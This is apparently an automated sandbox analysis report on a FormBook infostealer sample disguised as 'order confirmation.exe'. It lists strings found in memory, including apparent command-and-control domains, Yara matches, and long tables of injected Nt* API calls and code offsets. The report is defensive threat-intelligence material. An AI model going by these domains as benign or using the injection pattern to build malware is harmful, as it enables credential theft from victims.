30 0d 0a 0d 0a Data Ascii: 0
                Source: order confirmation.exeString found in binary or memory: http://tempuri.org/kviskotekaDbDataSet.xsdcIgra
                Source: XDBtzWJieMe.exe, 0000000A.00000002.2823935651.0000000004F06000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ana-silverco.shop
                Source: XDBtzWJieMe.exe, 0000000A.00000002.2823935651.0000000004F06000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ana-silverco.shop/eaqq/
                Source: SearchProtocolHost.exe, 00000009.00000002.2823206675.0000000004218000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000002.2825358139.00000000062E0000.00000004.00000800.00020000.00000000.sdmp, XDBtzWJieMe.exe, 0000000A.00000002.2822111339.0000000003188000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.canadavinreport.site/4d2l/?2VqtG=K0rLevU0Wh5tIJEp&KX=ZGBp9LUVeZbORoknng5
                Source: SearchProtocolHost.exe, 00000009.00000002.2823206675.00000000043AA000.00000004.10000000.00040000.00000000.sdmp, XDBtzWJieMe.exe, 0000000A.00000002.2822111339.000000000331A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.phoenix88.sbs/cgi-sys/suspendedpage.cgi?KX=I9QoqWawalcNSRHc2ItfPod4AkGcs3UgKY9BOPFHD5g/ps
                Source: SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: SearchProtocolHost.exe, 00000009.00000002.2823206675.0000000003EF4000.00000004.10000000.00040000.00000000.sdmp, XDBtzWJieMe.exe, 0000000A.00000002.2822111339.0000000002E64000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2289794618.000000002D134000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://cdn-bj.trafficmanager.net/?h=
                Source: SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: SearchProtocolHost.exe, 00000009.00000002.2818884774.0000000002F79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: SearchProtocolHost.exe, 00000009.00000002.2818884774.0000000002F79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: SearchProtocolHost.exe, 00000009.00000003.2177672053.0000000007D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: SearchProtocolHost.exe, 00000009.00000002.2818884774.0000000002F79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: SearchProtocolHost.exe, 00000009.00000002.2818884774.0000000002F79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: SearchProtocolHost.exe, 00000009.00000002.2818884774.0000000002F79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: SearchProtocolHost.exe, 00000009.00000002.2818884774.0000000002F79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.order confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.order confirmation.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.2823935651.0000000004EB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1983228417.0000000001310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2821333990.0000000003270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2821409903.00000000032C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1982675271.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2820915719.0000000002B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1984356146.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: order confirmation.exe
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0042CAB3 NtClose,4_2_0042CAB3
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2B60 NtClose,LdrInitializeThunk,4_2_013F2B60
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_013F2DF0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_013F2C70
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F35C0 NtCreateMutant,LdrInitializeThunk,4_2_013F35C0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F4340 NtSetContextThread,4_2_013F4340
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F4650 NtSuspendThread,4_2_013F4650
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2BA0 NtEnumerateValueKey,4_2_013F2BA0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2B80 NtQueryInformationFile,4_2_013F2B80
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2BF0 NtAllocateVirtualMemory,4_2_013F2BF0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2BE0 NtQueryValueKey,4_2_013F2BE0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2AB0 NtWaitForSingleObject,4_2_013F2AB0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2AF0 NtWriteFile,4_2_013F2AF0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2AD0 NtReadFile,4_2_013F2AD0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2D30 NtUnmapViewOfSection,4_2_013F2D30
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2D10 NtMapViewOfSection,4_2_013F2D10
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2D00 NtSetInformationFile,4_2_013F2D00
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2DB0 NtEnumerateKey,4_2_013F2DB0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2DD0 NtDelayExecution,4_2_013F2DD0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2C00 NtQueryInformationProcess,4_2_013F2C00
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2C60 NtCreateKey,4_2_013F2C60
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2CA0 NtQueryInformationToken,4_2_013F2CA0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2CF0 NtOpenProcess,4_2_013F2CF0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2CC0 NtQueryVirtualMemory,4_2_013F2CC0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2F30 NtCreateSection,4_2_013F2F30
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2F60 NtCreateProcessEx,4_2_013F2F60
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2FB0 NtResumeThread,4_2_013F2FB0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2FA0 NtQuerySection,4_2_013F2FA0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2F90 NtProtectVirtualMemory,4_2_013F2F90
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2FE0 NtCreateFile,4_2_013F2FE0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2E30 NtWriteVirtualMemory,4_2_013F2E30
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2EA0 NtAdjustPrivilegesToken,4_2_013F2EA0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2E80 NtReadVirtualMemory,4_2_013F2E80
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F2EE0 NtQueueApcThread,4_2_013F2EE0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F3010 NtOpenDirectoryObject,4_2_013F3010
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F3090 NtSetValueKey,4_2_013F3090
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F39B0 NtGetContextThread,4_2_013F39B0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F3D10 NtOpenProcessToken,4_2_013F3D10
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F3D70 NtOpenThread,4_2_013F3D70
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03554340 NtSetContextThread,LdrInitializeThunk,9_2_03554340
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03554650 NtSuspendThread,LdrInitializeThunk,9_2_03554650
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552B60 NtClose,LdrInitializeThunk,9_2_03552B60
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_03552BF0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552BE0 NtQueryValueKey,LdrInitializeThunk,9_2_03552BE0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552BA0 NtEnumerateValueKey,LdrInitializeThunk,9_2_03552BA0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552AD0 NtReadFile,LdrInitializeThunk,9_2_03552AD0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552AF0 NtWriteFile,LdrInitializeThunk,9_2_03552AF0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552F30 NtCreateSection,LdrInitializeThunk,9_2_03552F30
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552FE0 NtCreateFile,LdrInitializeThunk,9_2_03552FE0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552FB0 NtResumeThread,LdrInitializeThunk,9_2_03552FB0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552EE0 NtQueueApcThread,LdrInitializeThunk,9_2_03552EE0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_03552E80
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552D10 NtMapViewOfSection,LdrInitializeThunk,9_2_03552D10
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_03552D30
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552DD0 NtDelayExecution,LdrInitializeThunk,9_2_03552DD0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_03552DF0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_03552C70
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552C60 NtCreateKey,LdrInitializeThunk,9_2_03552C60
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_03552CA0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035535C0 NtCreateMutant,LdrInitializeThunk,9_2_035535C0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035539B0 NtGetContextThread,LdrInitializeThunk,9_2_035539B0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552B80 NtQueryInformationFile,9_2_03552B80
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552AB0 NtWaitForSingleObject,9_2_03552AB0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552F60 NtCreateProcessEx,9_2_03552F60
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552F90 NtProtectVirtualMemory,9_2_03552F90
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552FA0 NtQuerySection,9_2_03552FA0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552E30 NtWriteVirtualMemory,9_2_03552E30
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552EA0 NtAdjustPrivilegesToken,9_2_03552EA0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552D00 NtSetInformationFile,9_2_03552D00
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552DB0 NtEnumerateKey,9_2_03552DB0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552C00 NtQueryInformationProcess,9_2_03552C00
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552CC0 NtQueryVirtualMemory,9_2_03552CC0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03552CF0 NtOpenProcess,9_2_03552CF0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03553010 NtOpenDirectoryObject,9_2_03553010
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03553090 NtSetValueKey,9_2_03553090
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03553D70 NtOpenThread,9_2_03553D70
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03553D10 NtOpenProcessToken,9_2_03553D10
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_00A093A0 NtCreateFile,9_2_00A093A0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_00A09510 NtReadFile,9_2_00A09510
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_00A096B0 NtClose,9_2_00A096B0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_00A09610 NtDeleteFile,9_2_00A09610
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_00A09820 NtAllocateVirtualMemory,9_2_00A09820
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 0_2_01744AE00_2_01744AE0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 0_2_0174DE840_2_0174DE84
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 0_2_07D8D7570_2_07D8D757
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 0_2_07D8D7680_2_07D8D768
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 0_2_07D8E1180_2_07D8E118
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 0_2_07D8C0C00_2_07D8C0C0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 0_2_07D88CD00_2_07D88CD0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 0_2_07D8BC780_2_07D8BC78
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 0_2_07D8B84E0_2_07D8B84E
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 0_2_07D911FC0_2_07D911FC
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 0_2_07D989300_2_07D98930
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 0_2_07D9CD480_2_07D9CD48
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 0_2_07D92A900_2_07D92A90
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 0_2_082615F00_2_082615F0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_00418A934_2_00418A93
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0042F0D34_2_0042F0D3
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_004028F04_2_004028F0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_004031764_2_00403176
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_004011004_2_00401100
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_004031804_2_00403180
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_004103034_2_00410303
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0040245D4_2_0040245D
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_004024604_2_00402460
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_00416C934_2_00416C93
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0040E5194_2_0040E519
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_004105234_2_00410523
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0040E5234_2_0040E523
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0040E6674_2_0040E667
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0040E6734_2_0040E673
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0040E73B4_2_0040E73B
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014481584_2_01448158
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B01004_2_013B0100
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0145A1184_2_0145A118
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014781CC4_2_014781CC
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014801AA4_2_014801AA
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014741A24_2_014741A2
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014520004_2_01452000
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0147A3524_2_0147A352
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014803E64_2_014803E6
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013CE3F04_2_013CE3F0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014602744_2_01460274
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014402C04_2_014402C0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C05354_2_013C0535
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014805914_2_01480591
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014724464_2_01472446
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014644204_2_01464420
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0146E4F64_2_0146E4F6
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C07704_2_013C0770
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013E47504_2_013E4750
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BC7C04_2_013BC7C0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013DC6E04_2_013DC6E0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013D69624_2_013D6962
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C29A04_2_013C29A0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0148A9A64_2_0148A9A6
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C28404_2_013C2840
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013CA8404_2_013CA840
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013A68B84_2_013A68B8
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013EE8F04_2_013EE8F0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0147AB404_2_0147AB40
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01476BD74_2_01476BD7
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BEA804_2_013BEA80
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013CAD004_2_013CAD00
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0145CD1F4_2_0145CD1F
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013D8DBF4_2_013D8DBF
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BADE04_2_013BADE0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C0C004_2_013C0C00
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B0CF24_2_013B0CF2
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01460CB54_2_01460CB5
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01434F404_2_01434F40
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013E0F304_2_013E0F30
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01402F284_2_01402F28
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01462F304_2_01462F30
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013CCFE04_2_013CCFE0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0143EFA04_2_0143EFA0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B2FC84_2_013B2FC8
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0147EE264_2_0147EE26
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C0E594_2_013C0E59
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0147EEDB4_2_0147EEDB
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013D2E904_2_013D2E90
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0147CE934_2_0147CE93
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0148B16B4_2_0148B16B
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013AF1724_2_013AF172
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F516C4_2_013F516C
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013CB1B04_2_013CB1B0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0146F0CC4_2_0146F0CC
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0147F0E04_2_0147F0E0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014770E94_2_014770E9
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C70C04_2_013C70C0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0147132D4_2_0147132D
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013AD34C4_2_013AD34C
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0140739A4_2_0140739A
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C52A04_2_013C52A0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014612ED4_2_014612ED
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013DB2C04_2_013DB2C0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014775714_2_01477571
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0145D5B04_2_0145D5B0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B14604_2_013B1460
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0147F43F4_2_0147F43F
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0147F7B04_2_0147F7B0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014716CC4_2_014716CC
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014559104_2_01455910
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C99504_2_013C9950
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013DB9504_2_013DB950
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0142D8004_2_0142D800
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C38E04_2_013C38E0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0147FB764_2_0147FB76
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01435BF04_2_01435BF0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013DFB804_2_013DFB80
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013FDBF94_2_013FDBF9
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01477A464_2_01477A46
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0147FA494_2_0147FA49
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01433A6C4_2_01433A6C
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0146DAC64_2_0146DAC6
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01405AA04_2_01405AA0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01461AA34_2_01461AA3
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0145DAAC4_2_0145DAAC
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01471D5A4_2_01471D5A
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01477D734_2_01477D73
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C3D404_2_013C3D40
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013DFDC04_2_013DFDC0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01439C324_2_01439C32
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0147FCF24_2_0147FCF2
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0147FF094_2_0147FF09
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C1F924_2_013C1F92
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0147FFB14_2_0147FFB1
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C9EB04_2_013C9EB0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035DA3529_2_035DA352
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_0352E3F09_2_0352E3F0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035E03E69_2_035E03E6
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035C02749_2_035C0274
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035A02C09_2_035A02C0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035A81589_2_035A8158
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035BA1189_2_035BA118
